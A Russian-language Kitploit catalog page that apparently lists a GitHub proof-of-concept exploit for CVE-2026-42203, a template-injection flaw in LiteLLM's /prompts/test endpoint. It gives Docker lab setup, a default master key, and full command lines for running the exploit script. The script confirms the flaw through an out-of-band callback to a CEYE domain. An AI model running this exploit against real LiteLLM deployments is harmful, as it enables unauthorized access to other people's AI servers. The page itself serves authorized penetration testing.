Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/astianjy/cve-2026-42203
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubastianjy/cve-2026-42203

CVE-2026-42203

Эксплойт proof-of-concept для CVE-2026-42203, уязвимости SSTI в конечной точке /prompts/test в LiteLLM, с проверкой обратного вызова CEYE для авторизованного тестирования.

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Руководство по эксплуатации PoC для LiteLLM CVE-2026-42203

В этой статье объясняется, как запустить локальную среду LiteLLM и выполнить CVE-2026-42203.py для проверки уязвимости SSTI /prompts/test.

Используйте только в локальной тестовой среде, на которую у вас есть разрешение. Не направляйте скрипт на неавторизованные общедоступные цели.

1. Запуск локальной среды

Перейдите в каталог Lab и запустите LiteLLM, Postgres и Prometheus:

root@kitploit:~
docker compose up -d

Проверьте состояние контейнеров:

root@kitploit:~
docker compose ps

Убедитесь, что сервис доступен:

root@kitploit:~
curl http://127.0.0.1:4000/

Master_Key по умолчанию: sk-master-test-key-1234

2. Настройка CEYE и ключа LiteLLM

http://ceye.io/profile

Передайте через аргументы командной строки:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

Значение переменных:

  • LITELLM_API_KEY: ключ доступа к LiteLLM, в локальной среде Docker обычно соответствует LITELLM_MASTER_KEY в .env.
  • CEYE_DOMAIN: ваш поддомен CEYE, например xxxxxx.ceye.io.
  • CEYE_TOKEN: ваш API-токен CEYE, используется для запроса записей обратного вызова.

3. Выполнение PoC

Полный пример:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --target http://127.0.0.1:4000 \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

Ключевые параметры:

  • --target: адрес сервиса LiteLLM, по умолчанию http://127.0.0.1:4000.
  • --auth / --api-key: ключ LiteLLM, используемый для вызова /prompts/test.
  • --ceye-domain: домен обратного вызова CEYE.
  • --ceye-token: токен API CEYE. При выводе скрипт автоматически скрывает чувствительные данные.
  • --wait: время ожидания обратного вызова CEYE в секундах, по умолчанию 20.
  • --interval: интервал опроса записей CEYE в секундах, по умолчанию 3.
  • --timeout: таймаут HTTP-запроса, по умолчанию 10 секунд.
  • --insecure: добавьте этот параметр, если цель использует самоподписанный сертификат HTTPS, чтобы отключить проверку сертификата TLS.

4. Оценка результатов

Если CEYE получит обратный вызов, скрипт выведет:

root@kitploit:~
[VULNERABLE] CEYE received the callback request.

Если в течение времени ожидания обратный вызов не получен, скрипт выведет:

root@kitploit:~
[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.
Скачать инструмент